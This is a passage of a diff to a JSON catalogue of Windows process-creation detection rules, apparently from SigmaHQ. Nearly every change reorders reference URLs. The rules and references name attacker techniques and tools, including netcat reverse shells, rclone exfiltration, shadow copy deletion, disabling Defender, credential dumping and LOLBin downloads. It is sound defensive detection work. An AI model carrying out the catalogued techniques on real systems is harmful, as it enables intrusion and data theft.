"https://github.com/Neo23x0/Raccine#the-process", + "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" ], "tags": [ @@ -42257,9 +42281,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" ], "tags": [ @@ -42283,8 +42307,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" ], @@ -42328,8 +42352,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml" ], "tags": [ @@ -42362,8 +42386,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/S3cur3Th1sSh1t/SharpImpersonation", "https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/", + "https://github.com/S3cur3Th1sSh1t/SharpImpersonation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_impersonation_tool.yml" ], "tags": [ @@ -42495,11 +42519,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/JohnLaTwC/status/1223292479270600706", - "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", - "https://twitter.com/bohops/status/980659399495741441", "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://twitter.com/JohnLaTwC/status/1223292479270600706", + "https://twitter.com/bohops/status/980659399495741441", + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" ], "tags": [ @@ -42599,9 +42623,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/bryon_/status/975835709587075072", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", - "https://twitter.com/bryon_/status/975835709587075072", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" ], "tags": [ @@ -42801,8 +42825,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", "https://github.com/cube0x0", + "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" ], "tags": "No established tags" @@ -42823,8 +42847,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml" ], "tags": [ @@ -42858,9 +42882,9 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", - "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", "https://twitter.com/Z3Jpa29z/status/1317545798981324801", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", + "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" ], "tags": [ @@ -42963,8 +42987,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://www.scythe.io/library/threat-emulation-qakbot", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" ], "tags": [ @@ -43031,8 +43055,8 @@ "logsource.product": "windows", "refs": [ "https://www.nirsoft.net/utils/nircmd.html", - "https://www.nirsoft.net/utils/nircmd2.html#using", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" ], "tags": [ @@ -43099,8 +43123,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" ], "tags": [ @@ -43124,10 +43148,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/hfiref0x/UACME", "https://twitter.com/hFireF0X/status/897640081053364225", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" ], "tags": [ @@ -43298,9 +43322,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1186631731543236608", - "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://twitter.com/cyb3rops/status/1186631731543236608", "https://github.com/Neo23x0/DLLRunner", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" ], @@ -43435,9 +43459,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" ], "tags": [ @@ -43579,8 +43603,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml" ], "tags": [ @@ -43670,8 +43694,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windowsoptionalfeature.yml" ], @@ -43876,8 +43900,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml" ], "tags": [ @@ -43901,10 +43925,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", - "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", - "https://lolbas-project.github.io/lolbas/Binaries/Setres/", "https://twitter.com/0gtweet/status/1583356502340870144", + "https://lolbas-project.github.io/lolbas/Binaries/Setres/", + "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml" ], "tags": [ @@ -43945,11 +43969,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", + "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" ], "tags": [ @@ -43982,9 +44006,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" ], "tags": [ @@ -44017,9 +44041,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", "https://twitter.com/haroonmeer/status/939099379834658817", "https://twitter.com/c_APT_ure/status/939475433711722497", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" ], "tags": [ @@ -44380,8 +44404,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1475085452784844803?s=12", "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", + "https://twitter.com/mrd0x/status/1475085452784844803?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" ], "tags": "No established tags" @@ -44509,8 +44533,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/defaultpack.exe", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/", + "https://www.echotrail.io/insights/search/defaultpack.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml" ], "tags": [ @@ -44545,8 +44569,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", "https://twitter.com/gN3mes1s/status/1206874118282448897", + "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml" @@ -44614,8 +44638,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/Kevin-Robertson/Inveigh", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml" ], "tags": [ @@ -44648,8 +44672,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml" ], "tags": [ @@ -44758,8 +44782,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml" ], "tags": [ @@ -44951,11 +44975,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", - "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", - "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", - "https://twitter.com/egre55/status/1087685529016193025", "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", + "https://twitter.com/egre55/status/1087685529016193025", + "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" ], "tags": [ @@ -45266,8 +45290,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" @@ -45387,8 +45411,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" ], @@ -45447,8 +45471,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" ], "tags": [ @@ -45481,8 +45505,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" @@ -45561,10 +45585,10 @@ "logsource.product": "windows", "refs": [ "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", - "https://github.com/ohpe/juicy-potato", - "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", - "https://pentestlab.blog/2017/04/13/hot-potato/", "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://github.com/ohpe/juicy-potato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" ], "tags": [ @@ -45632,8 +45656,8 @@ "logsource.product": "windows", "refs": [ "https://nmap.org/ncat/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://www.revshells.com/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml" ], "tags": [ @@ -45727,8 +45751,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" @@ -45763,8 +45787,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hashcat.net/wiki/doku.php?id=hashcat", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", + "https://hashcat.net/wiki/doku.php?id=hashcat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml" ], "tags": [ @@ -45826,9 +45850,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/frack113/status/1555830623633375232", - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" ], "tags": [ @@ -45927,8 +45951,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" ], @@ -46097,11 +46121,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", "https://twitter.com/Hexacorn/status/885553465417756673", - "https://twitter.com/vysecurity/status/885545634958385153", - "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", "https://twitter.com/Hexacorn/status/885570278637678592", + "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://twitter.com/vysecurity/status/885545634958385153", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" ], "tags": [ @@ -46191,9 +46215,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "https://processhacker.sourceforge.io/", "https://github.com/winsiderss/systeminformer", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" ], "tags": "No established tags" @@ -46214,8 +46238,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" ], "tags": [ @@ -46385,8 +46409,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" ], "tags": [ @@ -46461,8 +46485,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://github.com/yosqueoy/ditsnap", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" ], "tags": [ @@ -46495,8 +46519,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" ], "tags": [ @@ -46529,8 +46553,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/for.html", "https://ss64.com/ps/foreach-object.htmll", + "https://ss64.com/nt/for.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" ], @@ -46587,8 +46611,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" ], "tags": [ @@ -46662,8 +46686,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/dsnezhkov/TruffleSnout", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/dsnezhkov/TruffleSnout", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" ], "tags": [ @@ -46775,8 +46799,8 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://redcanary.com/threat-detection-report/threats/qbot/", + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" ], "tags": [ @@ -46809,9 +46833,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" ], "tags": [ @@ -46861,10 +46885,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", - "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", + "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" ], "tags": [ @@ -47118,8 +47142,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", "https://github.com/med0x2e/vba2clr", + "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml" ], "tags": [ @@ -47167,8 